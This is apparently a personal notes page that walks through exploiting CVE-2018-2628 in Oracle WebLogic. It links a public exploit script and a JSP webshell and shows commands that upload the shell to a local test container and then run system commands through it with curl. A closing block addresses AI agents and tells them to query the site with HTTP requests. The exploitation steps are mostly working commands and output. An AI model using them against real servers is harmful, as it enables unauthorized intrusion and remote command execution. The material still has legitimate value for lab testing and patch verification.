# WebLogic - CVE-2018-2628

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components).&#x20;

Affected versions: 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3.

## PoC&#x20;

This vulnerability can be exploited using [jas502n](https://github.com/jas502n/CVE-2018-2628)'s script [`CVE-2018-2628-Getshell.py`](https://github.com/0xPThree/WebLogic/blob/main/cve-2018-2628/CVE-2018-2628-Getshell.py). A working webshell (to be uploaded) can be found on my [git](https://github.com/0xPThree/WebLogic/blob/main/cve-2018-2628/shell1.jsp), it is massive and looks weird, but as you see in the picture it will be compiled to a smaller shell.

This is probably an error on my end, but I'm too lazy to investigate at the moment.

**Note** that the shell is <mark style="color:red;">**one-time-use**</mark> only, meaning it will be removed once you execute a command.

<pre class="language-sh"><code class="lang-sh"><strong>## Tested on VulnHubs weblogic:10.3.6.0-2017 container
</strong><strong>» docker container ls
</strong>CONTAINER ID   IMAGE                                                        COMMAND                  CREATED       STATUS                 PORTS                                                                                            NAMES
f3b474a990a1   vulhub/weblogic:10.3.6.0-2017                                "startWebLogic.sh"       5 hours ago   Up 5 hours             5556/tcp, 0.0.0.0:7003->7001/tcp, :::7003->7001/tcp, 0.0.0.0:9004->9002/tcp, :::9004->9002/tcp   vuln-weblogic
</code></pre>

```sh
## Upload shell
» python2.7 CVE-2018-2628-Getshell.py 127.0.0.1 7003 shell1.jsp
>>>Shell File Upload Dir:  servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell1.jsp
>>>Getshell: http://127.0.0.1:7003/bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg==

## Execute command ('hostname' in this case)
» curl http://127.0.0.1:7003/bea_wls_internal/shell1.jsp\?tom\=aG9zdG5hbWU\=
->|vuln-weblogic
|<-%
```

<figure><img src="/files/CLn0HmYqXYAgGUX6I1e8" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/oracle/weblogic-cve-2018-2628.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.